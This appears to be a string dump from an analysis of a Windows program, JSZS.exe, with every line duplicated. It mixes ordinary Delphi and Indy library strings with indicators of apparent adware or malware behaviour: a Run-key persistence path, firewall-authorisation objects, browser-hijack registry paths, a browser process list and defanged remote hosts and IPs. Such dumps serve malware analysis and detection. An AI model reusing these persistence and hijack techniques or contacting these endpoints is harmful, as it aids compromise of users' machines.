%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket operation on non-socket.
Socket operation on non-socket.
Protocol not supported.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Protocol family not supported.0Address family not supported by protocol family.
Resolving hostname %s.
Resolving hostname %s.
Connecting to %s.
Connecting to %s.
Socket Error # %d
Socket Error # %d
Operation would block.
Operation would block.
Operation now in progress.
Operation now in progress.
Operation already in progress.
Operation already in progress.
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
DCOM not installed"'%s' is not a valid property value
DCOM not installed"'%s' is not a valid property value
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Unable to insert a line Clipboard does not support Icons Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form
Unable to insert a line Clipboard does not support Icons Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
Enhanced Metafiles Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
Enhanced Metafiles Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex
Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Unsupported clipboard format
Unsupported clipboard format
#''%s'' is not a valid date and time#''%s'' is not a valid integer value
#''%s'' is not a valid date and time#''%s'' is not a valid integer value
''%s'' is not a valid time
''%s'' is not a valid time
No help found for %s
No help found for %s
Invalid image-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d
Invalid image-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d
The specified path is too long The specified path was not found The path format is not supported The specified file was not found$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and
The specified path is too long The specified path was not found The path format is not supported The specified file was not found$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and
Invalid Timeout value: %s
Invalid Timeout value: %s
''%s'' is not a valid date Out of memory while expanding memory stream)%s has not been registered as a COM class
''%s'' is not a valid date Out of memory while expanding memory stream)%s has not been registered as a COM class
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to create key %s
Failed to create key %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Unable to write to %s
Invalid file name - %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists
A class named %s already exists
External exception %x
External exception %x
Interface not supported
Interface not supported
Object lock not owned(Monitor support function not initialized
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
('%s' is not a valid floating point value
('%s' is not a valid floating point value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
copy%original file name%.exe_896_rwx_00567000_00015000:
1.2.3
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
KGS!@#$%X
KGS!@#$%X
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
kernel32.dll
kernel32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyW
LoadKeyboardLayoutW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextW
GetKeyNameTextW
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
version.dll
version.dll
GetCPInfo
GetCPInfo
CreateIoCompletionPort
CreateIoCompletionPort
RegUnLoadKeyW
RegUnLoadKeyW
RegSaveKeyW
RegSaveKeyW
RegRestoreKeyW
RegRestoreKeyW
RegReplaceKeyW
RegReplaceKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegLoadKeyW
RegLoadKeyW
RegFlushKey
RegFlushKey
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
shell32.dll
shell32.dll
ShellExecuteW
ShellExecuteW
winspool.drv
winspool.drv
netapi32.dll
netapi32.dll
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
windowscodecs.dll
windowscodecs.dll
JSZS.exe_1560:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.rdata
.rdata
@.reloc
@.reloc
B.rsrc
B.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
%s[%d]
%s[%d]
%s_%d
%s_%d
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
TaskDialogIndirect
TaskDialogIndirect
EInvalidGraphicOperation
EInvalidGraphicOperation
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
UrlMon
UrlMon
shell32.dll
shell32.dll
PasswordChar
PasswordChar
OnKeyDown
OnKeyDown
OnKeyPressx
OnKeyPressx
OnKeyUp
OnKeyUp
ssHorizontal
ssHorizontal
clWebSnow
clWebSnow
clWebFloralWhite
clWebFloralWhite
clWebLavenderBlush
clWebLavenderBlush
clWebOldLace
clWebOldLace
clWebIvory
clWebIvory
clWebCornSilk
clWebCornSilk
clWebBeige
clWebBeige
clWebAntiqueWhite
clWebAntiqueWhite
clWebWheat
clWebWheat
clWebAliceBlue
clWebAliceBlue
clWebGhostWhite
clWebGhostWhite
clWebLavender
clWebLavender
clWebSeashell
clWebSeashell
clWebLightYellow
clWebLightYellow
clWebPapayaWhip
clWebPapayaWhip
clWebNavajoWhite
clWebNavajoWhite
clWebMoccasin
clWebMoccasin
clWebBurlywood
clWebBurlywood
clWebAzure
clWebAzure
clWebMintcream
clWebMintcream
clWebHoneydew
clWebHoneydew
clWebLinen
clWebLinen
clWebLemonChiffon
clWebLemonChiffon
clWebBlanchedAlmond
clWebBlanchedAlmond
clWebBisque
clWebBisque
clWebPeachPuff
clWebPeachPuff
clWebTan
clWebTan
clWebYellow
clWebYellow
clWebDarkOrange
clWebDarkOrange
clWebRed
clWebRed
clWebDarkRed
clWebDarkRed
clWebMaroon
clWebMaroon
clWebIndianRed
clWebIndianRed
clWebSalmon
clWebSalmon
clWebCoral
clWebCoral
clWebGold
clWebGold
clWebTomato
clWebTomato
clWebCrimson
clWebCrimson
clWebBrown
clWebBrown
clWebChocolate
clWebChocolate
clWebSandyBrown
clWebSandyBrown
clWebLightSalmon
clWebLightSalmon
clWebLightCoral
clWebLightCoral
clWebOrange
clWebOrange
clWebOrangeRed
clWebOrangeRed
clWebFirebrick
clWebFirebrick
clWebSaddleBrown
clWebSaddleBrown
clWebSienna
clWebSienna
clWebPeru
clWebPeru
clWebDarkSalmon
clWebDarkSalmon
clWebRosyBrown
clWebRosyBrown
clWebPaleGoldenrod
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebLightGoldenrodYellow
clWebOlive
clWebOlive
clWebForestGreen
clWebForestGreen
clWebGreenYellow
clWebGreenYellow
clWebChartreuse
clWebChartreuse
clWebLightGreen
clWebLightGreen
clWebAquamarine
clWebAquamarine
clWebSeaGreen
clWebSeaGreen
clWebGoldenRod
clWebGoldenRod
clWebKhaki
clWebKhaki
clWebOliveDrab
clWebOliveDrab
clWebGreen
clWebGreen
clWebYellowGreen
clWebYellowGreen
clWebLawnGreen
clWebLawnGreen
clWebPaleGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumAquamarine
clWebMediumSeaGreen
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkOliveGreen
clWebDarkgreen
clWebDarkgreen
clWebLimeGreen
clWebLimeGreen
clWebLime
clWebLime
clWebSpringGreen
clWebSpringGreen
clWebMediumSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebPaleTurquoise
clWebLightCyan
clWebLightCyan
clWebLightBlue
clWebLightBlue
clWebLightSkyBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebDarkBlue
clWebIndigo
clWebIndigo
clWebMediumTurquoise
clWebMediumTurquoise
clWebTurquoise
clWebTurquoise
clWebCyan
clWebCyan
clWebPowderBlue
clWebPowderBlue
clWebSkyBlue
clWebSkyBlue
clWebRoyalBlue
clWebRoyalBlue
clWebMediumBlue
clWebMediumBlue
clWebMidnightBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebDarkTurquoise
clWebCadetBlue
clWebCadetBlue
clWebDarkCyan
clWebDarkCyan
clWebTeal
clWebTeal
clWebDeepskyBlue
clWebDeepskyBlue
clWebDodgerBlue
clWebDodgerBlue
clWebBlue
clWebBlue
clWebNavy
clWebNavy
clWebDarkViolet
clWebDarkViolet
clWebDarkOrchid
clWebDarkOrchid
clWebMagenta
clWebMagenta
clWebDarkMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebMediumVioletRed
clWebPaleVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebBlueViolet
clWebMediumOrchid
clWebMediumOrchid
clWebMediumPurple
clWebMediumPurple
clWebPurple
clWebPurple
clWebDeepPink
clWebDeepPink
clWebLightPink
clWebLightPink
clWebViolet
clWebViolet
clWebOrchid
clWebOrchid
clWebPlum
clWebPlum
clWebThistle
clWebThistle
clWebHotPink
clWebHotPink
clWebPink
clWebPink
clWebLightSteelBlue
clWebLightSteelBlue
clWebMediumSlateBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebLightSlateGray
clWebWhite
clWebWhite
clWebLightgrey
clWebLightgrey
clWebGray
clWebGray
clWebSteelBlue
clWebSteelBlue
clWebSlateBlue
clWebSlateBlue
clWebSlateGray
clWebSlateGray
clWebWhiteSmoke
clWebWhiteSmoke
clWebSilver
clWebSilver
clWebDimGray
clWebDimGray
clWebMistyRose
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlateBlue
clWebDarkSlategray
clWebDarkSlategray
clWebGainsboro
clWebGainsboro
clWebDarkGray
clWebDarkGray
clWebBlack
clWebBlack
Proportional
Proportional
OnExecute
OnExecute
{43826d1e-e718-42ee-bc55-a1e261c37bfe}
{43826d1e-e718-42ee-bc55-a1e261c37bfe}
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
AutoHotkeys
AutoHotkeys
AutoHotkeys`
AutoHotkeys`
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
Wh,%F
Wh,%F
@8
@8
Vh,%F
Vh,%F
Sh,%F
Sh,%F
Ph,%F
Ph,%F
imm32.dll
imm32.dll
OnExecute@
OnExecute@
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview@
KeyPreview@
WindowStateD
WindowStateD
tagMSG
tagMSG
GlassFrame.Bottom
GlassFrame.Bottom
GlassFrame.Enabled
GlassFrame.Enabled
GlassFrame.Left
GlassFrame.Left
GlassFrame.Right
GlassFrame.Right
GlassFrame.SheetOfGlass
GlassFrame.SheetOfGlass
GlassFrame.Top
GlassFrame.Top
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
Uh.hG
Uh.hG
User32.dll
User32.dll
%s, ClassID: %s
%s, ClassID: %s
%s, ProgID: "%s"
%s, ProgID: "%s"
ole32.dll
ole32.dll
CoXMLHTTPRequest
CoXMLHTTPRequest
olepro32.dll
olepro32.dll
%d.%d.%d.%d
%d.%d.%d.%d
PTF://
PTF://
login error
login error
hXXp://
hXXp://
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
HTTP/1.1
HTTP/1.1
grfKeyState
grfKeyState
TComTargetExecEvent
TComTargetExecEvent
CmdGroup
CmdGroup
nCmdID
nCmdID
nCmdexecopt
nCmdexecopt
hhctrl.ocx
hhctrl.ocx
URLMON.DLL
URLMON.DLL
SHDOCLC.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetWidth
TEWBWindowSetHeight
TEWBWindowSetHeight
bstrUrlContext
bstrUrlContext
bstrUrl
bstrUrl
OnWindowSetResizableP
OnWindowSetResizableP
OnWindowSetLeft
OnWindowSetLeft
OnWindowSetTop
OnWindowSetTop
OnWindowSetWidth
OnWindowSetWidth
OnWindowSetHeight`
OnWindowSetHeight`
URLHISTORY_ENTRY
URLHISTORY_ENTRY
spUrl
spUrl
wininet.dll
wininet.dll
FindFirstUrlCacheGroup
FindFirstUrlCacheGroup
FindNextUrlCacheGroup
FindNextUrlCacheGroup
GetUrlCacheGroupAttributeA
GetUrlCacheGroupAttributeA
SetUrlCacheGroupAttributeA
SetUrlCacheGroupAttributeA
FindFirstUrlCacheEntryExA
FindFirstUrlCacheEntryExA
EWebBrokerExceptionU
EWebBrokerExceptionU
TAsyncExecuteThreadU
TAsyncExecuteThreadU
SENSAPI.DLL
SENSAPI.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
OpenUrlForIEMin repeat
OpenUrlForIEMin repeat
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
Down\ETagFile.dat
Down\ETagFile.dat
HNetCfg.FwMgr
HNetCfg.FwMgr
HNetCfg.FwAuthorizedApplication
HNetCfg.FwAuthorizedApplication
%d.%d
%d.%d
Shell.Application
Shell.Application
Shell32.dll
Shell32.dll
SysShadow
SysShadow
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Oleacc.dll
Oleacc.dll
var x = document.createElement("link");x.rel = "stylesheet";x.type = "text/css";x.media = "screen";x.href = "
var x = document.createElement("link");x.rel = "stylesheet";x.type = "text/css";x.media = "screen";x.href = "
document.getElementsByTagName("head")[0].appendChild(x);
document.getElementsByTagName("head")[0].appendChild(x);
scrollbar.css
scrollbar.css
KERNEL32.DLL
KERNEL32.DLL
\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\
\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\
System.ItemAuthors
System.ItemAuthors
prop:System.ItemAuthors
prop:System.ItemAuthors
{0AFACED1-E828-11D1-9187-B532F1E9575D}
{0AFACED1-E828-11D1-9187-B532F1E9575D}
%SystemRoot%\system32\shdocvw.dll
%SystemRoot%\system32\shdocvw.dll
TSimpleUdpClient
TSimpleUdpClient
E:\My Dropbox\Works\Components\superobjectv1.2.4\superobject.pas
E:\My Dropbox\Works\Components\superobjectv1.2.4\superobject.pas
Unsuported variant data type: %d
Unsuported variant data type: %d
rcmDefault
rcmDefault
rcmDebug
rcmDebug
DontExecuteScripts
DontExecuteScripts
DontExecuteJava
DontExecuteJava
DontExecuteActiveX
DontExecuteActiveX
DisableUrlIfEncodingUTF8
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
lpMsg
PMsg
PMsg
pguidCmdGroup
pguidCmdGroup
TTranslateUrlEvent
TTranslateUrlEvent
pchURLIn
pchURLIn
ppchURLOut
ppchURLOut
CmdID
CmdID
pszUrl
pszUrl
pszUrlContext
pszUrlContext
szPassWord
szPassWord
ErrorUrl
ErrorUrl
OptionKeyPath
OptionKeyPath
OverrideOptionKeyPath
OverrideOptionKeyPath
OnTranslateUrlH
OnTranslateUrlH
OnCommandExech
OnCommandExech
'%s' is not supported.
'%s' is not supported.
WebocPopupManagement
WebocPopupManagement
ValidateNavigateUrl
ValidateNavigateUrl
HttpUsernamePasswordDisable
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
GetUrlDomFilePathUnencoded
XmlHttp
XmlHttp
MAPI32.DLL
MAPI32.DLL
hXXps://
hXXps://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
.Current
\ieframe.dll
\ieframe.dll
\shdocvw.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TMsgEvent
TKeyEventEx
TKeyEventEx
Port
Port
Password
Password
poPortrait
poPortrait
0.750000
0.750000
3333333
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
EmbeddedWB hXXp://bsalsa.com/
EmbeddedWB hXXp://bsalsa.com/
Setup.ini
Setup.ini
TFormWebShow
TFormWebShow
TFormLoginTips
TFormLoginTips
LoginUrl
LoginUrl
/WebShell
/WebShell
CMD:Login
CMD:Login
CMD:Reg
CMD:Reg
CMD:Logout:
CMD:Logout:
CMD:Close
CMD:Close
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
user32.dll
user32.dll
Uh.CL
Uh.CL
UnsupportedGdiplusVersion
UnsupportedGdiplusVersion
PropertyNotSupported
PropertyNotSupported
aclBurlyWood
aclBurlyWood
1.0.4
1.0.4
SYSTEM\CurrentControlSet\Services\%s
SYSTEM\CurrentControlSet\Services\%s
usbrasr.sys
usbrasr.sys
hXXp://ou.sushouspell.com:7831/udsk
hXXp://ou.sushouspell.com:7831/udsk
*.lnk
*.lnk
*.url
*.url
iexplore.exe
iexplore.exe
hXXp://VVV.hao123.com/
hXXp://VVV.hao123.com/
http\shell\open\command
http\shell\open\command
{CC893ED2-9B4E-45BA-B402-07E7DA15891D}
{CC893ED2-9B4E-45BA-B402-07E7DA15891D}
ull.dat
ull.dat
as.dat
as.dat
ts.dat
ts.dat
acdat.dat
acdat.dat
,chrome.exe,360chrome.exe,firefox.exe,iexplore.exe,qqbrowser.exe,baidubrowser.exe,liebao.exe,theworld.exe,2345chrome.exe,360se.exe,ucbrowser.exe,maxthon.exe,
,chrome.exe,360chrome.exe,firefox.exe,iexplore.exe,qqbrowser.exe,baidubrowser.exe,liebao.exe,theworld.exe,2345chrome.exe,360se.exe,ucbrowser.exe,maxthon.exe,
Software\Microsoft\Windows\CurrentVersion\App Paths\JiSuZhuShou
Software\Microsoft\Windows\CurrentVersion\App Paths\JiSuZhuShou
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
uninst.exe
uninst.exe
URLInfoAbout
URLInfoAbout
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
JSHlp.exe
JSHlp.exe
add.dat
add.dat
edi.dat
edi.dat
hXXp://udt.sushouspell.com:5400/xc?qid=
hXXp://udt.sushouspell.com:5400/xc?qid=
hXXp://udt.sushouspell.com:5400/tj2?qid=
hXXp://udt.sushouspell.com:5400/tj2?qid=
hXXp://120.131.64.117:5400/tj2?qid=
hXXp://120.131.64.117:5400/tj2?qid=
dt10.dat
dt10.dat
dt11.dat
dt11.dat
dt12.dat
dt12.dat
pai.dat
pai.dat
ou.sushouspell.com
ou.sushouspell.com
bjie.dat
bjie.dat
222.88.93.108
222.88.93.108
125.43.78.118
125.43.78.118
xh.dat
xh.dat
-1002_5_srr.exe
-1002_5_srr.exe
-1002_15_srr.exe
-1002_15_srr.exe
atpp.dat
atpp.dat
btpp.dat
btpp.dat
hXXp://outj.sushouspell.com:
hXXp://outj.sushouspell.com:
\nvse.dat
\nvse.dat
hXXp://qd1.jxjiawu.com:5115/qv?sid=5&mianid=
hXXp://qd1.jxjiawu.com:5115/qv?sid=5&mianid=
runa.ini
runa.ini
ftt.sushouspell.com
ftt.sushouspell.com
120.131.64.116
120.131.64.116
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRange
EIdInvalidPortRange
C:\Builds\TpAddons\IndyNet\System\IdStreamVCL.pas
C:\Builds\TpAddons\IndyNet\System\IdStreamVCL.pas
C:\Builds\TpAddons\IndyNet\System\IdGlobal.pas
C:\Builds\TpAddons\IndyNet\System\IdGlobal.pas
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
Wship6.dll
Wship6.dll
EIdIPVersionUnsupportedU
EIdIPVersionUnsupportedU
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
127.0.0.1
127.0.0.1
C:\builds\TpAddons\IndyNet\System\IdStack.pas
C:\builds\TpAddons\IndyNet\System\IdStack.pas
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
ClientPortMin
ClientPortMin
ClientPortMax
ClientPortMax
PortSVW
PortSVW
EIdPortRequired
EIdPortRequired
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
Port
Port
C:\builds\TpAddons\IndyNet\Core\IdIOHandler.pas
C:\builds\TpAddons\IndyNet\Core\IdIOHandler.pas
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
TIdTCPClientCustom
TIdTCPClientCustom
IdTCPClient
IdTCPClient
TIdTCPClient
TIdTCPClient
TIdTCPClient|$O
TIdTCPClient|$O
BoundPort
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
saUsernamePassword
Password
Password
0.0.0.1
0.0.0.1
0.0.0.0
0.0.0.0
DefaultPort
DefaultPort
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
ISO_646.irv:1991
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.basic:1983
ISO_646.irv:1983
ISO_646.irv:1983
csISO16Portuguese
csISO16Portuguese
csISO84Portuguese2
csISO84Portuguese2
windows-936
windows-936
csShiftJIS
csShiftJIS
ISO-8859-1-Windows-3.0-Latin-1
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csWindows31Latin5
csMicrosoftPublishing
csMicrosoftPublishing
Windows-31J
Windows-31J
csWindows31J
csWindows31J
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
.aiff=audio/x-aiff
.aiff=audio/x-aiff
.au=audio/basic
.au=audio/basic
.mid=midi/mid
.mid=midi/mid
.mp3=audio/x-mpg
.mp3=audio/x-mpg
.m3u=audio/x-mpegurl
.m3u=audio/x-mpegurl
